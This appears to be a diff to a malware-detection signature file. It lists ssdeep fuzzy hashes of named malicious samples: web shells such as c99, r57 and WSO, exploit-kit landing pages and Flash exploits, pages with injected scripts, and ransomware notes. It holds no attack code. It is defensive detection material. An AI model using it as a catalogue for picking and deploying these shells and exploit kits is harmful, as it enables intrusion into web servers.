+1536:amcvhKmgxdrK7PcWytG2rGGWJSJ7mRJ0nNKuix0SZvdG/Ds5dYXlq/Ug1B8aLmnF:AJKmgxdrK7PcWytG2rGGWJSJ7mRJ0nNn,"2016-02-15-page-from-www.health-total.com-with-injected-script.txt"
+1536:akgMg2LkEcpZqliEFfXOaPR4eMLJRFRamRHe5gZ6Rg7HhUyS6fOwoKZbUSYGeebE:XLgsT+6RSgSYGL45aTq,"JspSpy.jsp"
+1536:AjRpXqvjcXfg2Yw30sZY6tEQ6l9I5JeiqnAWsVKQ4gtUbN:AjDXqvjcvgyksm7Q6kNqPsVKjgtUbN,"2016-04-22-pseudo-Darkleech-Angler-EK-landing-page.txt"
+1536:aIGk1jFcMmPTuiCtZ6/MGJiEy91mQkFzNSXMXgg48FIHoitY:aevzGJiEy91mQkFzNSKggtKi,"IndoXploit.php"
+1536:A/iE9zi3StXe2KkfZA1Me8phDFVGu22x5fZ0:qzI+XrO1MTphDFVGu2kR0,"zehir3_01_by_zehir.asp.txt"
+1536:Ahog7x7JlWXGJ9VqOyv/QV4jpcsKpbMr0LkpxfivLu2eHOHlHe/JsYcMxDqti9/t:YcWpnyVp+MrCk7fcLPHlHLUDqti9J,"一句话.doc"
+1536:afaXQJQ2CCf0qq3ylh8rZpT+sIaviZgZej0+EcPv0TeuJ9lbLI+S4TH0n26Lae1I:qmQJQ2jf0qCyKZptG/EUYzbLIb4MZcPH,"2016-06-28-Neutrino-EK-flash-exploit-after-mu-media.co.uk.swf"
+1536:A/8tHClqfveOnlceJSjeO0BUnu70m7koj6Rgj:3xCoeuVSR0iu70m7kRR2,"c99shell.jpg"
+1536:A8o/Or4+6NW0SBNd47/hBDaYGh/XBRKHC5QhsdAlMtg7aumB1UWjXgKR9sruxx:fo/Or4+6C4PaYG1hKlMqaumB1UWjXgwX,"2016-02-09-page-from-centrestage.org-with-malicious-injected-script.txt"
+1536:A6TYxyYsT7vQvfzyQsZxDIJv7qA7OYPrVaMb5286ndSBrlpgnSPTCvYtKy:exbsTEyhZxDIJv7/7OYPjJpgnSP2y,"body.113.112"
+1536:a6TYxyFUwtaL5Bz5B6Y0LHUYl996Av3O3HzCYYEsa5BBrlPgnSPTCvqtKy:cxHEY0LHUYl996AvreJPgnSPAy,"body.113.141"
+1536:a6TYxyF6wJSFFDAgPBzZMWNWWPj3MBKTpOO5/zga3xpnOrldgnSPTCvytKy:cxzkgNT0JdgnSPcy,"body.113.149"
+1536:a6TYxyaKpwaSSfsHnlCfvJd4v05fAEy2tJsIUyZhBrl0gnSPTCvqtS:cx+p3fsHnlCfR0a3P/J0gnSP4,"body.113.084"
+1536:a6TYxyaJwzVyq/jVwNM+Wu3c6SrF1YUYFORbKjElCxx/ah5rl4gnSPTCvmtS:cxFEVR/jVwNM+Wu3c/7XfJ4gnSP0,"body.113.073"
+1536:A6TYxyaEwTBd/qpot/BZo+e3qwB4+SjdXAMWN/5rlygnSPTCv8tS:exYadSpKZo+eAAJygnSPu,"body.113.098"
+1536:A6TYxXEm88FPWEq1GTI74kiagWHpPuB9cW+h1vjqgnyPTCvstKy:extLFPbTu4k0WJhdqgnyPGy,"body.113.307"
+1536:A6TYxXE088FymOGEqOUhhwKfcztZ1euJWw9VtpMKXAjdbJXadgnyPTCvstKy:exDLFymOGEqOUhqKfcT1zwKIEdgnyP6y,"body.113.292"
+1536:A6TYxsEOw2bVAtAkxzK7ziWH6hC/r1ZdhW4Oi5eOrlNgnSPTCv4tKy:ex2DbGukxu7ziWH/9tJNgnSPGy,"body.113.206"
+1536:A6TYxIo9tYJtPtu3b8N7aVy1ZpXNF9tsjAsMNguPTCvm:ex6tP03b8NtBdB2oguPt,"body.113.033"
+1536:A6gKmYVnXkTNrDnjpeZJbD16yVbiA9hZspp1ZFTEQYCxHOOeHYeH5sEJ3eLJbCuT:VUXMnu9kz4gx4xajliE823K4Bl4LjTp,"Backdoor.ASP.Rootkit.c.asp"
+1536:a4rlcm3g/0GpVEQ0Z0TXOdkW0x3hieIHlT5JmyihXrGXW9E+7X7qXxl3KRwvg+6r:fWOuWDTmyihygqBl3M,"2016-08-19-page-from-thatauditguy.com-with-injected-EITest-script.txt"
+1536:a1EndfdhWBgyzAth86qnVs1u7vA7uhpl2g1Oti+tq:aSi,"good.php"
+1536:9ta3TOYu3eijbnvmU5+lMQaWzGt8LadU55Fpx365QXStgMEp11QokZcLSJfQCDQD:EVu3/nMlpikxPStgMm1QfUS9N3jm5OS,"2016-03-24-Nuclear-EK-landing-page-after-macfly-studio.com.txt"
+1536:9OE6IQcM5XhKb0gO4ZbbZUO7gIidpbgISHEd8WkkKFSvdY+FwjaHqWwp5TO:YiMbRNQbb1KVSkiTQlY+lHqWSO,"gfs_sh2.jpg"
+1536:9ncpPCt1xJ3JJJJn7ctIz8ExL3LvdcCXJzPYffzNlA9Jtz8NnL8iR:79LoENOCX9wDNGbtYNnwW,"r57.jpg"
+1536:9LbIZB/qP3ze0FdXvab9rP6lzoWx8gZf4:JbwBSbe0vXva5rQsmRf4,"sniper.zip"
+1536:9FV8OZOBeBgITZp1wd8y68hdybHmUph/rIRFt:9oOZOBYgOZp67jhSmUplrIl,"2017-03-09-Rig-EK-landing-page.txt"
+1536:9FNgW/TTBgUdwIiTzCBwskjeExxQNWq7Dhr9p36wI+263:933Z3iTOBwskjeFI+xpJ,"2016-06-15-Sundown-EK-landing-page-first-example.txt"
+1536:9Fb/gkXXMlidJzaWRNeWdzaWRNehEQOyczUKR7cuCOo+LkD1MuHySaYf9wnlXeP9:9x/mEZVIDGuHySaPan,"spyjsp2010.jsp"
+1536:9EYdSIl0COuMAQUyQHu346gKuDubzpj+jvpTGQQOE9tDJ:9EYdSIl0C8eyQM46gKuDuXt+JgtDJ,"Dx.txt.001"
+1536:96vYxmhtL8GbOI3uZoGAZUFEFngEhqguPTC4dcMY:1xXGbOI3f2RguPI,"body.113.026"
+1536:96TYxYaybEw5voTYaMl1Cav/2iZuilRczqctz+T8NzZgnSPTCvNtS:zxoyYv1n/2iZjALZgnSPz,"body.113.053"
+1536:96TYxyauwLJhVbbGCpD+TPTkiZaxStSH1W/UtBFwOwy4i5OLhoYwtr5rlfgnSPTm:zxCeJhNGjT/ZaOSVvv+ViJfgnSPny,"body.113.108"
+1536:96TYxXEhw6u7+COjl26t1l2lGMosoZoAvRYOYiVlFH3Xv9RC8FEgnyPTCvZtKy:zxkH26t1l2lXAvRlZDREgnyP7y,"body.113.274"
+1536:93Ne7iPuSV8kG+CGd+Dj7tVai+GDc5cZpWLSTm8+E03r9vLpIos5Z04dVYH:He7iPuScYaDc5cISTm8+d,"air?"
+1536:91SdghT7EcyhnWNP8vTuG6OfL3FLFdfmh8bQHlDTYESlDx8y2L8RI:5tDsnB9RFLFk8EHlTQF8rQG,"2016-08-01-pseudoDarkleech-Neutrino-EK-flash-exploit.swf"
+1536:8X5bNl5R1bfvrvdtpM9KiztMFpqTwBRde+74Uf7wPzn:8d5vkKiztMFpPRvbWn,"VirusShare_9b7a483f78ccbbd7c85ff6cb86ac9497"
+1536:8pEpudhWBgyzAth86qnVs1u7vA7uhpl2g1Oti+tq:8s,"good.php.40"
+1536:8lcNJWJcvvmmM9KzVplyqRAynnk4v7NJv3PDw:8q8KzVpPRvn7zw,"wso.txt.001.001"
+1536:8J6MOcNNEnaBbRAy3DCmmMEKXP9Vplym64C6Mg93Pf/c:8MMVRvToKXP9VpzpE,"wso-4.1.3.php"
+1536:8iRCkjndsTVjZ2FLje0YEDEK6Pm4+K5MB3x1pJy3oTAG5pG:8iRCkjngWvDUa6eAspG,"CyberSpy5.Asp"
+1536:8iRCkjndsTVjZ2FLje0YEDEK6Pm4+K5MB3x1pJy3oTAG5pD:8iRCkjngWvDUa6eAspD,"CyberSpy5.asp"
+1536:8hkGAlD2tqwLImx14Ya66bCiePzvjBh7NzwWzKgl9lseiY/seHFOcUpN1:9xmx+YSbCiePzvjBh7NzwWzKgl9lseif,"pic08.txt.1"
+1536:8GkW+fSkD3Rs3RnsAwl0OOpNaCs9c7qpOOs2BF/jBFYYBF9MBFPWbVh3H3jh0Qpj:4icOOsK0QYWbVh3,"2016-06-01-page-from-joellipman.com-with-injected-pseudoDarkleech-script.txt"
+1536:8aGh9vT4/RAAUcjEORrLsM+lapkfFgWsMhxbHKxb+EAOclIcLdHhVBmPz+:8aIvT4ZAAUcgS3sbiYqcb6KOcKwdBqPz,"fqgvmr.dll"
+1536:86TYxyahwLUa8tsfDexcuDT6mhCZglMQryJG06kBrlQgnSPTCvwtS:qxdwUa8tsfD6DfChJQgnSPy,"body.113.088"
+1536:86TYxXED88cd+IkHHYthFpDTU6UW7hjmhUAH9eWqyws+rQMjpgnyPTCvctKy:qx0LytzDTLF7hjmhPKpgnyPuy,"body.113.310"
+1536:7zE0dfdhWBgyzAth86qnVs1u7vA7uhpl2g1Oti+tq:7Fi,"good.php.2"
+1536:7Z8kcLrHFypcFzlV/AMFnT4BGRzekn69yh1M:FcFypcFfoATkGZtn6Ah2,"牛逼免杀提权隐藏大马.asp"
+1536:7xml0lMph8YvMjnNXZqrPUeTf4N64NchRH19Z9yjB9RSpIyogTooE:7xRA6YGXZePUeTgY4yHWrQZcoE,"sh.txt"
+1536:+7vNkDmGr36a/GiG8BOfm+rLBNA0ss66zZDRTcoKZIJ9mdE3Dx8BWf1B6Yks2dUq:+w36a/GKOPBNA0sn64IJYmy7s2rv9GG,"ctt_sh_by_RODNOC.php.txt"
+1536:+7vNkDmGr36a/GiG8BOfm+rLBNA0ss66zZDRTcoKZIJ9mdE3Dx8BWf1B6Yks2dUJ:+w36a/GKOPBNA0sn64IJYmy7s2rv9GF,"ctt_sh.txt.001"
+1536:7UYdSg3qhY5Au0BENlZqy3HRuU7H4rJ1uJyLVXtmkqKz1KJbg3Jiig:LSg/9HRuUj4rJ1ukLLmkqKzEv,"2016-08-24-page-from-reperemaramuresene.ro-with-injected-EITest-script.txt"
+1536:7UU9GkhQZVzjMcupyV5ZqdQYe2FGzZxPkuHuv2xbMX+o4Zr3KYZj7EMxupdnRQaR:7U2hQZtMcxU9eJFe/oIgeYZBxsyitx7,"2016-07-21-other-Neutrino-EK-payload-Bandarchor-first-and-second-run.exe"
+1536:7UE71eUG/EwB4/Cpyq56Uz8cMxNAG3H+79JNvPwT42kQ/qVwVSVuVkTyDbSL6lTn:p7jCp+CKMseSbVn,"SJavaWebManageV1.4.jsp"
+1536:7sYIlAO7MX6Db3ug9mN2EM9K6+8wGOsUOJsOc4+8wGOsUOJH5a3b:nLO7MX6H95EMM3Zw6b,"Sheller_by_LocalMan.v1.02.php.txt"
+1536:7PQTKP2g+0elYPKaGHOSuGxxEGwLX4+Tqoi4zrbrH69e+PuUEm8RDonWqSTmY+EP:Cg+0elYsxEGwLXLrbrH61STmYAm1t,"r57_bd.v1.42.php.txt"
+1536:7PQTKP2g+0elYPKaGHOSuGxxEGwLX4+Tqoi4zrbrH69e+PuUEm8RDonWqSTmY+EO:Cg+0elYsxEGwLXLrbrH61STmYAnt5,"r57shell1.42.php"
+1536:7lSMPwHMc4CWucXaF/PtnGo3fqG95/S49lSbbF5s4FUlG0J0UsrZn2CRl:7UMciuZljqidSIlSl5s4Uc0JVsBn,"DJ团队.asp"
+1536:7IDPEqVoQzjreP/cyaRUKmGmleJVN9qyqPrCNSExDcmCj0h+nLrITL+pQQrnVW+u:cDPEqVFreP/cyaRUKmGmleJVN9qyyuNP,"银河舰队大马_2012版.asp"
+1536:7hggo3e3fxO18p6QruC/1rLyOZDiDT/uI0jgO9:7hs3Yfoqjr99O0Ofh0jl9,"mal2.php"
+1536:7cNNWvL/LUnGwFQVCTrCsG+Ykz7so8qvrR:SNWvL/LUnl2CqsG+N7z8qTR,"qq.phps"
+1536:7CJOvXE1QlYb1rdoNxV4iSq44vwfBkUx6mB1+xkwI:7CfQl0xyZYpqxJM,"2017-03-10-page-from-oliveriosristorante.com-with-injected-HoeflerText-script-3rd-run.txt"
+1536:7CJOvXE1QlYb1rdoNxV4iSq44vwfBkUx6mB1+xkII:7CfQl0xyZYpqxJu,"2017-03-10-page-from-oliveriosristorante.com-with-injected-HoeflerText-script-2nd-run.txt"
+1536:7CJOvXE1QlYb1rdoNxV4iSq44vwfBkUx6mB1+xkBI:7CfQl0xyZYpqxJF,"2017-03-06-page-from-oliveriosristorante.com-with-injected-HoeflerText-script-3rd-run.txt"
+1536:7CJOvXE1QlYb1rdoNxV4iSq44vwfBkUx6mB1+xk9I:7CfQl0xyZYpqxJn,"2017-03-10-page-from-oliveriosristorante.com-with-injected-HoeflerText-script-1st-run.txt"
+1536:7CJOvXE1QlYb1rdoNxV4iSq44vwfBkUx6mB1+xk1I:7CfQl0xyZYpqxJ9,"2017-03-06-page-from-oliveriosristorante.com-with-injected-HoeflerText-script-4th-run.txt"
+1536:7CJOvXE1QlYb1rdoNxV4iSq44vwfBkUx6mB1+xk0I:7CfQl0xyZYpqxJy,"2017-03-06-page-from-oliveriosristorante.com-with-injected-HoeflerText-script-7th-run.txt"
+1536:79UmU02w9J0wRku/woiq26ppX+KRTXW7EhkX3z2:mmU02wsq2CTI7UU36,"零魂PHP一句话木马客户端.php"
+1536:784bvw60sWyB5Vx3ju1Ua9mE9x7CSlwa+Y5RZ6+R9yWG5DSwcuVRSTlQYzIkyfut:784bvw60sWyB5Vx3ju1Ua9mE9x7CSlwu,"swift 24a2.js"
+1536:76TYxYatJmmv0gQmaFInbO1JWXvXnBdIO0dZfwQv2gxW/q6mhiIuIgtSPTCvPtS:VxTH0VWvRdIO0dZf1sVIgtSPx,"body.113.039"
+1536:76TYxyakwS3+8vSUxrlYbtItdrZPubaen2KOwF3c2XOrlwgnSPTCvDtKy:VxAd3+8vSklWipZ2sKKJwgnSPdy,"body.113.126"
+1536:76TYxyaIw7sDaEtG4zVxV1tC5lxUzon0uf1t+0BrlbgnSPTCvntKy:VxUXVxV1tCV0gJbgnSP9y,"body.113.105"
+1536:76TYxyahw1WANFW8D9VD99xIDNrSo0KAw8bHgbnqglMfUYBna8zb6+RWGnecZOrB:VxlsNhvDxIDNrjArbj8KzvkJXgnSPJ,"body.113.081"
+1536:76TYxya3w8siAKfKSG8lP9Ib1dZu48CR5rFnxdP3lL0Ku5rlOgnSPTCv7tKy:VxTjSdg48C1yPJOgnSPty,"body.113.121"
+1536:76TYxya2wCyiwFlUyQIEOl/tCaObV6AZhKiHzQHUOrlCgnSPTCvTtS:VxirwsyPEOl/tCacQ7JCgnSPl,"body.113.096"
+1536:76TYxXEp88PGPpPZmC1Q6/qP0kp2Br594fTk71TjkailLi148qH4l0xgnyPTCvn7:VxoLPGxq6/qtpWr0fTk71T7l0xgnyPxy,"body.113.366"
+1536:76TYxXEMe88dP0Tlv4GBg1h+uUCfP8IkAA4Omxlhd6rujjgnyPTCvHtKy:Vx5eLdPAlv4G4+uUCfPGuLPjgnyP5y,"body.113.309"
+1536:76TYxXEa881aMp9T9Bw5FKvflavDUNp4xFApBJvPaiRzNjhchgnyPTCvftKy:VxrL1DYUlavDU+bwhchgnyPJy,"body.113.357"
+1536:76TYxsEwwBgQt7i+HOJHQozP4AvcbedWLE5rlegnSPTCvrtKy:VxISgm7i+wHeAJegnSPly,"body.113.161"
+1536:76TYxsESwwBhZjRvGhStpzpLtDe/SJVRowrGsT+0/kw2pjdiOrlpgnSPTCvvtKy:VxqRlS/PwysMJpgnSPpy,"body.113.177"
+1536:6YOGLthcVt/WaKds4O2KQ4nFARuIFdff6tEU:6YJitxK9efnFzodfe,"3CA shell.php"
+1536:/6TYxyHawLGq9h9h4HRqKpVhhVSLBzEywou85rlHgnSPTCv3tKy:Jxn0GIfmHfVGjJHgnSPNy,"body.113.114"
+1536:+6TYxyaywp73DwG2Sr6oiJZ2ABU04vcetlWvhdBrl4gnSPTCv2tS:Ax2Yw5ToEZLUbEJ4gnSP4,"body.113.068"
+1536:+6TYxyaNw/Ls+gpLukMi24qI24a1heRhdqdUCCCEIEmBp2h+JhO1BrlhgnSPTCvB:Axh6LsTpLFxvdquJUQLJhgnSPQ,"body.113.086"
+1536:/6TYxXEvuwznVLT05YWzGq9896ibB542Zg3KZTR43zRcR6tdVtvhD9P4XjdgnSPA:JxmuYW7if42Zg3KZIRhCdgnSPhy,"body.116.002"
+1536:/6TYxXE188kpnMI75cIppAqMkcEFAryDjg999tWTuvhalgnyPTCvLtKy:JxGLkpnzAqMqF+yxlgnyPxy,"body.113.295"
+1536:/6TYxsEVwRdKeAlGU6xOgLnR3AB/bNbWVPjfZQVSdlA4rBrlHgnSPTCvrtKy:Jx9xG1xOgLnNAhNqjAQJHgnSPhy,"body.113.189"
+1536:+6TYxsEiwP4WxuGuwLDsxsN8nax27cH7rwCQc/MQAimBrlNgnSPTCvytKy:AxKSuwLDsxsN8D7cneJNgnSPoy,"body.113.185"
+1536:/6TYxsEfwdKVAKVyxA1IQSaj0Fu9cRrI7UrnGuqfq5mgqBrlegnSPTCv3tKy:Jx3pAs9WrfqxJegnSPty,"body.113.170"
+1536:+6TYxsEdwRnqrqrZ2yxh8AFZ4xcW/pdScTiIToDrkiDkOrlXgnSPTCvitKy:Ax11rqrMyxh8A03/pdmJXgnSPQy,"body.113.187"
+1536:+6TYxsE3wd0v0Ohz5d2kQi4LKgmnWYvj0I3sz7pvYLxaBrlOWgcgnSPTCvOtKy:Ax/cOp21LKgmWTF7ScJ/gnSPky,"body.113.181"
+1536:+6TYxIootYQAOTFFRpjFgxG3FyD4b/guPTCvm:AxmAOT9BguPt,"body.113.035"
+1536:6sydwyKZ/JTVy3nrkR4qpOO4V3g7JPG05simyts:odwyKZ/J5y3nrkR4gOvhglDWibs,"2016-02-24-page-from-atwellandgent.com-with-injected-script.txt"
+1536:6sO38guahUSbzYwG0RrnJ0MKqAsCC0V//cstYZlehyXYJLOgG39OrZ:6sE5y0RrnJHKqAsCC0V/kstYZlehyXYp,"2016-06-24-page-from-sunlait.com-with-injected-pseudoDarkleech-script.txt"
+1536:6Sl2G7Yt1OaINKJu7MFxyv0sqA62sxZcBb:662ISMDNKtyvZzF,"small.php.php.txt"
+1536:6pEMdddhWBgyzAth86qnVs1u7vA7uhpl2g1Oti+tq:6zo,"good.php.8"
+1536:6Fb/giXXMlidJzaWRNeWdzaWRNehEQO4czUKR7cuCOo+LkD1MuHySaYf9wnlXeP9:6xLmEZTIDGuHySaPan,"queryDong.jsp"
+1536:6EYdSu40GMuMAQUmiHbueQkKu1ubZpjE/dpdsQQYE9t74:6EYdSu40GKemiyeQkKu1uFtELgt74,"0e83217effdeb1f2e658bc2072c6f3c0.php"
+1536:6EYdSnV0GguMAQU6THbvgYdKuLubOpj5IBpmNQQbw9tZf:6EYdSnV0GWe6TrgYdKuLuit5BUtZf,"DxShell.php.php.txt"
+1536:6c4/MM9yzB0La5v7ovPyy3fNnWNlt5BoOPp2yf7BUgBM/XI3l5r14u:94/MQivEDADx2yf7BUgBo8rKu,"2016-04-22-page-from-whitenmysmilenow.com-with-injected-pseudo-Darkleech-script.txt"
+1536:6ARKIaBOW4L4lOtlCeuijuuVc3T888pNa:vRVaClxuiapD89pNa,"off.png.2"
+1536:69U4ZYdBLQ5Zag4z/RUUAOKh6HyN3i2D+SbZxlnppzZ/uHxeu:hdBLQTvk/OIKh6HvqTztls,"ASPXspy-1gif8a-aspx.aspx"
+1536:66TYxyFTwV+NJhEsVPA/f8BYJpVc1aaoRh7aWtCBrlIgnSPTCvmtKy:8x8fHifBJprqJIgnSPky,"body.113.145"
+1536:66TYxYaZwGVgCdIjIIPRKOsjWbaAsXGb/bDxcOZuAe8tIip49cNtLK+IHgtSPTCx:8x/fgCd5I5FTaAsCcOZXI/+IHgtSPw,"body.113.044"
+1536:66TYxXEI88BJ1TrUDnWTo6BBNqui/qYy6j3GgnyPTCv2tKy:8xxLBJ1TYDr6nNg3GgnyPMy,"body.113.340"
+1536:66TYxXEf88hd6rCsCF5SVmqzgMGgGEYXNdTbrmNzRZxXROwD/+HKTAYM3v9QA44i:8x0Lhd6+AGgGLmPZxXROwcS4WLgnyPAy,"body.113.324"
+1536:66TYxsEPew33Ho0HUJ+JyGTFvgBMAPv2VowbIPxln5rl2gnSPTCvutKy:8xHeoHEqyGhgBMO/J2gnSPcy,"body.113.216"
+1536:66TYxsELwq3vIO9HLG/MUQW+H+Znwf2hFqA1kaOrlmgnSPTCv+tKy:8xDrvIIL+/o/BJmgnSPky,"body.113.182"
+1536:66TYxsEjzwd/E5pHg+6sX7kcZgSywLa83NozvW7gFvOxsfgi9PblBrlZgnSPTCvQ:8xbzu/QHg+hXzgkNoz+XgJZgnSPcy,"body.113.190"
+1536:66TYxsEAwAukMGnufazFiGKEK+RMDCBWcOPvf7bAuP5rZj8gnSPTCvutKy:8xIPMGnuGKEK+RMjflZ58gnSPgy,"body.113.236"
+1536:66TYxsE5wQTGp7BcqRzdfq8ewXORcSDWr1h37IGBrlygnSPTCv2tKy:8xRLGp7JdfqZw/T/JygnSPgy,"body.113.162"
+1536:63Ne7iPuShtcbQCGm3xr+Tqoitf51tpWLSTm8+EEHTQvymBiD5Z0GLkVYI:Ue7iPuSK9f51cSTm83D,"r57shell2.0.php"
+1536:63Ne7iPuShtcbQCGm3xr+Tqoitf51tpWLSTm8+EEHTQvymBiD5Z0GLkVY1:Ue7iPuSK9f51cSTm836,"r57_by_KingDeface.v2.0.php.txt"
+1536:5YZzFEOkuqp1VagQNOVzocysIyAiQOlHKbnFMBMK6IK8eMG:m5kuqpLvOOVzocysXhAOtfu,"ASPXspy2.aspx"
+1536:5wCdBIkryik0YT+TqoiLsRFH51aLWLSTmU+ET6eDGWoAoCsEpIoKFRHpsgjdVYH:vwIH51TSTmU+3W,"VirusShare_5aa4a46faaf5925dbde7c531c719c4c9"
+1536:5Vy59ZAB4HrFWobWn+7O0m9CqMoVnygcnjg52uzMk:K6zoSnX9nMotjUk5Dj,"2017-02-26-Cerber_HELP_HELP_HELP_K4G4EG_.hta"
+1536:5Vq5RZA94Hv9KobWz+nO0m9CqMoVnygcnjg52uzMk:y2voSzT9nMotjUk5Dj,"2017-02-22-Cerber_HELP_HELP_HELP_XZFV_.hta"
+1536:5P1vk7i6GUHdXXeyQazBu+4HhiO2AEeLNFoqqhJ7SerN5sVI6xcBgPv7E+nzms9d:A4Ud4qhJvNPqcB47MfWWca98HrB,"jquery.min.js"
+1536:5Nh5/HVlFyTcBoWiDbGMJ5OxxfUEB0SnQ5cvx0pa2IiFpGuUfXoJE1Lrxg8Bjy4:5Nh5/1lFyTcBoW4bGMAxcE2SnQ5cvx0I,"wso.aspx"
+1536:5McCiUpvBOnORiMnF/vJ8C6pcL0qXvzAoqFfmMa222K:vovBOnHMndJ8Zq0qXv0oqFfmf,"PHP Shell.jpg"
+1536:5ljPjc10E1bwuOlGaKmBjmIptVRQ/ORG3B/55GCcRYZSmI/oQg/jVyq+fU+FfuAy:,"de_crypt_readme.bmp"
+1536:5ljPjc10E1bwuOlGaKmBjmIptVRQ/ORG3B/55GCcRYZSmI/oQg/jVyq+fU+FfuA3:,"2016-04-22-CryptXXX-de_crypt_readme.bmp"
+1536:5ljPjc10E1bwuOlGaKmBjmIptVRQ/ORG3B/55GCcRYZSmI/oQg/jVyq+fU+FfuA2:,"2016-04-26-CryptXXX-de_crypt_readme.bmp"
+1536:5IcNJ/iFcFdmmMBKpppzIlReyQ4h+1b491M4b3PDH:5Z8KpppKRpkinH,"log.txt"
+1536:5hbNlP17/Xvrts7lCAno56RkqJtpMUK7ztMzp66w+RLk4Ts6W4QRbwPzG:51ZC7loaK7ztMzpTRn22G,"VirusShare_1cae36c439d17d244b838c99821cd98f"
+1536:5Ej2h15Zpz491IpAy8yGbtv735H7ZCxYesbEIByRC7qYSW8MAXQWnq4H+pa6iVXL:R15ZZ491IeLRjpb8CXI3C7qYSVsWnq4B,"ncpf2.txt.1"
+1536:5dI9K/FbZ0YNG5EMAwuU2FGUojKVslibQPQ:55P0YNG5E7wZ2Wo,"NIX REMOTE WEB SHELL v1.0.php"
+1536:5bGjbjKJlCMAQUnKRWxZbNF9kMAjssf0HI9bhi9t+E:5bGjbjKJpenKRWxZbNF9BWs+2t+E,"dxshell.php"
+1536:5AszP9aDo1MF3/sZ3lnePoTr2cNGnpmZEX7NPf8UC4ShJ5CDBkE+:51skmJ/sfe9X7hdOJ56Bo,"EquationGroup.EquationLaser.zip"
+1536:585bvw60sWyB5Vx3ju1Ua9mE9x7CSlwa+Y5RZ6+R9yWG5DSwcuVRSTlQYzIkyfu8:585bvw60sWyB5Vx3ju1Ua9mE9x7CSlwP,"swift 58c8.js"
+1536:56vYxmTtL82bOEPfX9eBBAib9H64NxK+zguPTC4dcMY:ZxB2bOEPWtY+zguPI,"body.113.027"
+1536:56TYxyHCwGhcoIhtJRZ5iu2JF9LzBAlUYhF29GXNcWgEDE5rlDgnSPTCvBtS:/xfCN2JFwGY3wJDgnSPf,"body.113.092"
+1536:56TYxXENk88xYVJV/wGWjw6EaqgNNLG8iGnTmazX9B/UGMj69C1PDb7jXMognyP2:/xwkLx7EiNNViGnTJt6GbcXMognyPDy,"body.113.321"
+1536:56TYxXEL0wBSftgiC4HRsg2hTY3pPpUIRWp9rx2XPvrdj6gnyPTCvdtKy:/xC0dftg/4r223pP6l+6gnyPby,"body.132.001"
+1536:56TYxXEjwUmcN2Gx3/xmxGfSE4IjRZIijYgnSPTCvdtKy:/xAFx3/xmYYgnSPby,"body.113.244"
+1536:/52w9t4ox0nC7j/sXiYwwDAUM0EmXLUhLj05qlvKpZFEnNd:RPcox0nC7bNYt0SENhk5qQpZ6nNd,"2016-05-16-EITest-Angler-EK-landing-page-first-run.txt"
+1536:4KNXIlidLzaWRNe2dzaWRNedOnn9cum26bkWsEKpcpj:4MuWPMkWsQj,"JspSpyJDK5.jsp"
+1536:4hdlzFWAg3HyzhU30nYEMT2U7PmfqHAqJow+b:qlxs3kLFwDmfqHACk,"devshell.asp"
+1536:4b5snIOVDx5zbPctQudVx1qmDTtfusKieZ41spY3G6XL0VqmVwSC:4mIV73qm9fub41mYHL0YR,"m1130.txt"
+1536:47wRCMOkn5TbAwjwm23t9rfLSpezY+U2yZqujfUFYS:gMxpbyvSpiY+U2yZquw2S,"zehir3_04_by_zehir.asp.txt"
+1536:47IbNvK3XMb/Qnhy3kZuHqdtpMPKMxpubvu50Trg4h6Qud4fHwP+Q:47sNb/QnnqKMxpwu50TDuyLQ,"0bddeee2eeb850ea7e3e3288803c41e9_php.txt"
+1536:46lYxmoNtqChoWR7spjVcRSJ8OxEguPTCvm:0xdho7EfguPt,"body.113.030"
+1536:/44EX2S4xJof/5zO72BWyI33s00d8VBFwrjU7jE7lAovvBDb600RE:/LEGS8KXH3I3VDEaj+TvvB3z0RE,"2016-08-05-Magnitude-EK-flash-exploit.swf"
+1536:43Ne7iPuSHYSqwMxG0iN2+Tqoitp51epWLSTm8+EEHTQv2IqXr5Y0LMVnW:Oe7iPuS54Np51lSTm83a,"r57shell-v1.3.php"
+1536:40NXIlidLzaWRNe2dzaWRNedOnn9cum26bkWsEKpcpT:4iuWPMkWsQT,"JspSpyJDK5.jsp"
+1536:3yOT7ykllllllllllllllllllllllllllllllllllllllllllllllllllllllllG:Ca0pKOb,"kb.txt.4"
+1536:3XSbNl5R1Dbvrv0tpMBKiztMFpqTwhRde+74WfBwPzI:3I57fKiztMFpbRvfgI,"VirusShare_1f4112d6a6aef59cdefaa4f479dfe47a"
+1536:3vgCN/C86kbkjLCz0TI/4rauqNjOQmND1UuHxLldytgmOejwwtN:4CNahrjLgUatj/uHlveztN,"2016-07-29-EITest-Neutrino-EK-flash-exploit-after-nurseryrhymedaycare.ca.swf"
+1536:3suT7A0Z/lckIelzEDOqDFIjanEDOgDFIqxc/InIOIBI1xwU6gq0qYuMv:FZ/CczEDOqDFIjanEDOgDFIqxcAD,"Daisy.jpg.1"
+1536:3RIMi30PCl5ihfk2rVUlvydUHiqeBoyDimx/aDlWz15W/lb6Th4ocSRe:3uMiE6l4Zk2rm1ydlRWn6aDl68l2h41v,"2016-07-22-Afraidgate-Neutrino-EK-flash-exploit-first-run.swf"
+1536:3nEjtdhWBgyzAth86qnVs1u7vA7uhpl2g1Oti+tq:3t,"good.php.32"
+1536:3mcNJWJcvlmmM9KzVplyqRAynnk4W7NJv3PDZ:3/SKzVpPRvnGzZ,"wso2.php"
+1536:3KpNJvemKOGq5f7LF3g8wf9Xmy/1oWhabhGXpkYbWyCh0wkV9b8cRUHhBNiNyypM:3KpjveKT5f7LF3g8wlXmy/1oWMbhGXpw,"2016-03-18-page-from-neways4us.com-with-malicious-script.txt"
+1536:3hsdJYpkcSKXpNJSRPqQ8+DEhp4gJfilkzdZHDHfH:30JYzppIPp8+UldNHP,"2016-07-29-Magnitude-EK-flash-exploit-first-run.swf"
+1536:3HGH8SYByr7a3DEAp2MQN0yUES/H7mLfqQyyK:XGHhVWcrN0yO/bAyQTK,"2016-07-08-pseudoDarkleech-Neutrino-EK-flash-exploit-after-toronto-annex.com.swf"
+1536:3heLi+tPR7IgVxl2hpoPdLSZ6lDOqlrPcNZsjItFTgqBWBWBWBWBWBWBWBWBWBWM:ReLi+JRTl2zoPUAaUc/iCZHrVQ+qFaav,"c99_w4cking.jpg"
+1536:3F00r/iT2Uu6dicyVj8B2B0FdGGI3MA7a3p3whhFYZkHaz8kmojO04JZuCasNcva:3F00r/iTDyVj8B2B0FdGGI3HW3xwhhFF,"MSSQL.asp"
+1536:3Eyhr/iUPjea1lNao3MN+83K0d2QU3hA/shB4xkt/DkV8eHComQLB6NIhl28bsp1:3Eyhr/iU/ao3MNn3K0d2QU3q0H4xkt/j,"mssql.asp"
